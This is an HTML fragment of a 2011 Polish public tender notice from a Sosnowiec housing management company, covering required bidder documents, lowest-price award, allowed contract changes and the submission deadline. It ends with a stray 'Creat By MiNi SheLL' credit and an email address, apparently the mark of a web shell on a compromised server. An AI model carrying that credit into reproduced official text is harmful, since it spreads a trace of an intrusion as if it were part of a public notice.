<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b)	Formularz ofertowy złożony w formie oryginału (załącznik nr 2 do SIWZ);

c)	dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt 10.2 SIWZ oraz wykazujące brak podstaw do wykluczenia z postępowania, wymienione w pkt 10.3 SIWZ, złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę;

2.	kopię wniesionego na zasadach określonych w pkt 13 SIWZ wadium, poświadczoną 
za zgodność z oryginałem przez Wykonawcę;

3.	kopię dowodu opłacenia polisy ubezpieczeniowej, potwierdzoną za zgodność z oryginałem przez Wykonawcę;

4.	formularz teleadresowy Wykonawcy (załącznik nr 11 do SIWZ) złożony w formie oryginału;
5.	pełnomocnictwo (jeżeli dotyczy) - Wykonawcy samodzielnie ubiegającego się o udzielenie zamówienia.

6.	Oferta Wykonawców wspólnie ubiegających  się o udzielenie zamówienia musi zawierać: 

a)	wspólny formularz ofertowy złożony w formie oryginału (załącznik nr 2 do SIWZ);

b)	dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione 
w pkt 10.2 SIWZ oraz wykazujące brak podstaw do wykluczenia z postępowania, wymienione w pkt 10.3 SIWZ; 

c)	kopię potwierdzenia wniesionego wspólnie na zasadach określonych w pkt 13 SIWZ wadium;

d)	kopię dowodu opłacenia polisy ubezpieczeniowej;

e)	formularz teleadresowy Wykonawcy (załącznik nr 11 do SIWZ) złożony w formie oryginału, przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna;

f)	pełnomocnictwo - Wykonawców wspólnie ubiegających się  o udzielenie zamówienia publicznego.

7.	Dokumenty muszą  być złożone w formie oryginału lub kopii poświadczonej za zgodność   
z oryginałem przez Wykonawcę, przy czym:

a)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa z osobna dokumenty wskazane w pkt 11.1 SIWZ; 

b)	każdy z Wykonawców, który potwierdza spełnienie danego warunku w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa odpowiednio dokumenty wskazane w pkt 11.12 i 11.13  SIWZ oraz dokumenty potwierdzające, że roboty,
 o których mowa w pkt 11.4 SIWZ zostały wykonane należycie;

c)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa wypełnione odpowiednio lub z adnotacją (nie dotyczy) dokumenty wskazane w pkt 10.2.2 SIWZ, 10.2.3 SIWZ i 10.2.4 SIWZ;


8.	Oferta musi być podpisana przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy-

1.	w przypadku Wykonawców samodzielnie ubiegających się o udzielenie zamówienia: 

a)	przez osoby uprawnione zgodnie z aktualnym odpisem z właściwego rejestru lub wpisem 
do ewidencji działalności gospodarczej, lub

b)	osoby posiadające ważne pełnomocnictwo, którego oryginał, lub kopię  poświadczoną notarialnie za zgodność z oryginałem, lub odpis albo wyciąg z dokumentu sporządzony przez notariusza należy załączyć w ofercie

2.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna):
a)	osoby posiadające ważne pełnomocnictwo, którego oryginał, lub kopię poświadczoną notarialnie za zgodność z oryginałem, lub odpis albo wyciąg z dokumentu sporządzony przez notariusza należy załączyć w ofercie.

3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku innych podmiotów, jeśli Wykonawca korzysta z ich potencjału w zakresie wiedzy, doświadczenia, potencjału technicznego lub ludzkiego, kopie dokumentów dotyczących Wykonawcy lub tych podmiotów są poświadczane za zgodność  z oryginałem przez Wykonawcę lub te podmioty. 

4.	Dokumenty, o których mowa w pkt 10.7 SIWZ są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez inne podmioty udostępniające Wykonawcy odpowiednio potencjał techniczny, osoby zdolne do wykonania zamówienia, wiedzę i doświadczenie oraz zdolności finansowe zgodnie z zapisami §6 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. nr 226, poz. 1817).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający może dokonać zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, dotyczących:

34.1	terminu realizacji zamówienia - na skutek wystąpienia uzasadnionych przyczyn technicznych lub przyczyn związanych z organizacją prowadzenia kontroli, których nie było można przewidzieć, powodowanych np. długotrwałą nieobecnością użytkowników lokali, pracami remontowymi prowadzonymi w budynku, awariami sieci gazowej, itp.

34.2	osób uczestniczących w realizacji zamówienia zarówno po stronie Wykonawcy jak 
i Zamawiającego, gdy z przyczyn obiektywnych zmiany takie były konieczne, a powodowane np. zdarzeniami losowymi, zmianami kadrowo - personalnymi, itp.;


34.3	wskazanych przez Wykonawcę Podwykonawców, na skutek wystąpienia uzasadnionych przyczyn, niemożliwych wcześniej do przewidzenia, które wpływałyby na jakość świadczonych usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mzbm.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> mzbm@mzbm.sosnowiec.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2011 godzina 09:30, miejsce: Miejski Zarząd Budynków Mieszkalnych - TBS Spółka z o.o.
ul. Korczaka 7, 41-200 Sosnowiec
Sekretariat  I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.02.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com